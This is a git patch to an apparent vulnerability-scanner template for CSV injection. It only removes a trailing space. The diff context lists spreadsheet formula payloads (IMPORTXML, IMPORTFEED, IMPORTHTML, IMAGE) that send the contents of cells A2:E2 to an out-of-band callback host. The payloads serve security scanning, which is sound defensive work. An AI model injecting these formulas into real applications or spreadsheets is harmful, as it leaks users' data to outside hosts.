From cebc8c3268c651511f484640a41995acdb74701b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:36:17 +0530 Subject: [PATCH] trail space fix --- dast/vulnerabilities/csv-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml index 318d38f438..e0fb0f2e30 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/csv-injection.yaml @@ -25,7 +25,7 @@ http: - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' - - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' + - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' fuzzing: - part: query